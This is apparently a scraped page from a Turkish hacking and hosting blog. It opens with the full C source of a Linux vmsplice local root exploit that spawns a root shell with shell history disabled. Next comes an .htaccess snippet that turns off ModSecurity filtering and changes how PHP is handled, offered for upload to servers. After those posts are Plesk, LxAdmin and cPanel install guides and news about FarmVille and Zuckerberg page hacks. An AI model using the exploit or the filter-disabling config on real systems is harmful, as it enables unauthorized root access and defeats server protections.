Devamını Oku
2.6.18 2011 Local Root Exploit
/*
* jessica_biel_naked_in_my_bed.c
*
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.18 - 2011
*
* This is quite old code and I had to rewrite it to even compile.
* It should work well, but I don't remeber original intent of all
* the code, so I'm not 100% sure about it. You've been warned ;)
*
* -static -Wno-format
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
.htaccess ile PHP yi Devre Dışı Bırakın
Addhandler Modified By RedGuard
Options +FollowSymLinks
DirectoryIndex index.html
RemoveHandler .php
Options +Indexes
Options +ExecCGI
AddType te xt/plain .php
AddHandler server-parsed .php
Addhandler cgi-script .asp
AddType application/octet-stream .php
SecFilterEngine Off
SecFilterScanPOST Off
Kodları
.htaccess
Adında Kaydedip Sunucunuza Upload Ediniz ..
Devamını Oku
Linux Centos PLESK Kurulumu
Öncelikle merhabalar,
Yarı kendi anlatımım yarı ise alıntı yaptığım linux üzerine plesk kurulumunu anlatacağım lafı uzatmadan hemen detaylara geçelim.
1) Öncelikle Pleski indirebilmeniz için SWSOFT’dan bir account sahibi olmanız gerekmektedir. Accountlar ücretsiz olup programı indirdiğinizde sadece 1 adet domain barındırma limiti ile gelir. http://Üye Ol
2) Kayıt olduktan sonra ise Hangi işletim sistemini kurduysanız ona göre olan programı http://Üye Ol Ancak lütfen makinanızın kaç bit olduğunu göz önünde bulundurarak indirme işlemini gerçekleştirin aksi takdirde çok kötü bir performans alıcaksınız ve sunucu loadlarınız çok yüksek olacaktır.
3) Ben kurulumu Centos 4 versiyon bir makina üzerinde sizlere göstereceğim bu yüzden CentOS 4.x 64bit seçeneği altındaki Autoinstaller’ı indiriyorum. Linux makinanıza Konsoldan dosya indirmek için WGET komutunu kullanabilirsiniz. Tabi öncelikle Root olarak login olmanız gerektiğini de hatırlatalım.
Evet başlıyoruz ;
Kod:
# wget http://download1.parallels.com/Plesk/PPP9/CentOS4.3/parallels_installer_v3.4.1_build090204.18_os_CentOS_4.3_x86_64
Wget sonunda telnet aşağıdaki gibi göstericektir.
Artık installeri indirmiş olduk. Sıra geldi artık kuruluma geçmeye. Öncelikle Installer’a gerekli yetkileri vermemiz gerekir ki dosyaları oluşturup gerekli izinleri ayarlayabilsin. Bunun için CHMOD komutunu kullanabiliriz. Hemen geçiyoruz komutumuza :
Kod:
# chmod +x parallels_installer_v3.4.1_build090204.18_os_CentOS_4.3_x86_64.4
Artık yetkileri de verdiğimiz installerimizin işini yapması için gerekli komutu vermeye geldi sıra. Bunu da şu şekilde verebiliriz.
Kod:
./parallels_installer_v3.4.1_build090204.18_os_CentOS_4.3_x86_64.4
Bundan sonra Windows’dan pek de farklı olmamak üzere sizi bir Kurulum rehberi karşılayacak ve sizde ona isteklerinize göre PLESK’i nasıl kurucağınızı adım adım belirteceksiniz. Dikkat etmeniz gereken tek şey Server IP’lerinizin doğru olarak yapılandırılmış olmasıdır.
Kısa zamanda Windows üzerine PLESK kurulumu , WHM - Cpanel kurulumunu açıklayıcı bir şekilde anlatacağım. Kolay gelsin..
Devamını Oku
Kloxo , LxAdmin Kurulumu
Merhaba LxAdmin sayesinde minumum sistem kaynağı tüketen hızlı ve 40 alan adına kadar ücretsiz bir paneliniz olacak. Kurulum için aşağıdaki adımları takip edin.
1 Adım :
Firewall'unuzda 7777 ve 7778 nolu portları açtığınızdan emin olun !
Selinux kapalı değilse aşağıdaki komut ile iptal etmek zorundasınız,
setenforce 0
Adım 2 :
# [root@localhost~]# wget http://download.lxlabs.com/download/lxadmin/production/lxadmin-install-master.sh
# [root@localhost~]# sh ./lxadmin-install-master.sh
Lxadmin ile barebaer yüklenenler:
1. Web server:
* apache
* pure-ftp
* awstats
2. Mail server:
* qmail-toaster
* courier (imap pop)
* webmail
* httpd (for webmail)
3. Nameserver:
* bind
* bind-chroot
4. Database Server:
* mysql-server
Devamını Oku
SHH cPanel Kurulumu Özel Anlatım
Selamlar Muhteremler , cPanel Konusunda Sıkıntı Çektiklerini Duydum
İlk Olarak Root Bilgileriyle Putty ve Benzeri Root Bağlantısı Yapabilieceğinz Bi Uygulama İle Bağlantıyı Gerçekleştirin Daha Sonra Sırasıyla Şu Komutları Uygulayın ve
Yaklaşık 4 ila 5 Saat Beklemeniz Gerekmektedir.. Sunucunuzun Hızına Göre Değişir
Komutlar ;
mkdir /home/cpins
cd /home/cpins
wget http://layer1.cpanel.net/latest
sh latest
Devamını Oku
FarmVille’i karıştıran Türk
Facebook'ta FarmVille oynayanların duvarlarına espirili mesajlar gönderen Ekşın Man şaşkınlık yarattı.
Facebook’taki en yaygın çevrimiçi oyun olan FarmVille, Türkiye’den bir hacker’ın hedefi oldu. Ekşın Man adlı hacker, oyundaki açıkları kullanarak, üyelerin Facebook duvarlarına espirili mesajlar yazmakla yetindi.
Kullanıcıları sinirlendirse de esasen kullanıcı hesaplarına ve dosyalara zarar vermeyen hacker, FarmVille oynayan Facebook üyelerinin duvarlarına, arkadaş listelerinde olmamasına karşın, şu iki mesajı göndermeyi becerdi:
“Hey everyone be relax, your accounts are not hacked. This is a message only. Good gaming!” (Hey millet rahat olun, hesaplarınız hack’lenmedi. İyi oyunlar.)
“Can you hear me again? Farmville players? Yeees, greetings from Turkey to you too.” (Beni yine duyabiliyor musunuz? Farmville oynayanlar? Eveeet, size de Türkiye’den selamlar.”
Bu mesajın sonunda Türkçe olarak şu ifade yer aldı: “Farmville oyuncuları çileklerinizi toplayın low :D)
FarmVille’in işleticisi Zynga, oyunun hacklenip hacklenmediği konusunda henüz bir açıklama yapmadı. Ancak güvenlik açıklarıyla ilgili incelemenin sürdüğü belirtiliyor. Önceki gün, Facebook’un sahibi Mark Zuckerberg’in fan sayfasına onun adıyla tufah mesajlar gönderilmiş, firma bu açığın bir yazılım hatasından kaynaklandığını açıklamıştı.
Devamını Oku
Facebook Nasıl Hacklendi ?
Facebook hack'lenme olayına açıklık getirdi!
Facebook, Zuckerberg'in hack'lenmesinin sorumlusu buldu: İşte hack'in tek suçlusu...
Facebook, 27 Ocak'ta meydana gelen Mark Zuckerberg'in hayran sayfasının hack'lenmesini bir API bug'ına bağladı.
Facebook'a göre bu API bug'ı, izin verilmeyen kişilerin sadece kendi sayfasında değil farklı kullanıcların sayfasında da yazmasına izin veriyor ve şirket bu hatayı düzelttiğini bildiriyor. Güvenlik şirketi Sophos'da üst teknoloji danışmanı olan Graham Cluley konu hakkında şunları söylüyor:
"Buradan anlıyoruz ki olay 26 yaşında bir gencin Starbucks'a gidip bağlantısına müdahale edildiğin fark etmemesi kadar basit değil. Anlaşılıyor ki Zuckerberg'in fan sayfasının hack'lenmesinin arkasındaki hikaye çok daha kötü. İzin verilmeyen kişilerin sayfalara güncelleme gönderebilmesi potansiyel olarak olta saldırısı, spam ve zararlı saldırılar için dahi kullanılabilirdi."
Zuckerberg'in hayran sayfası hack'lendikten sonra devre dışı bırakılmıştı, ancak şu an çalışıyor.
Devamını Oku
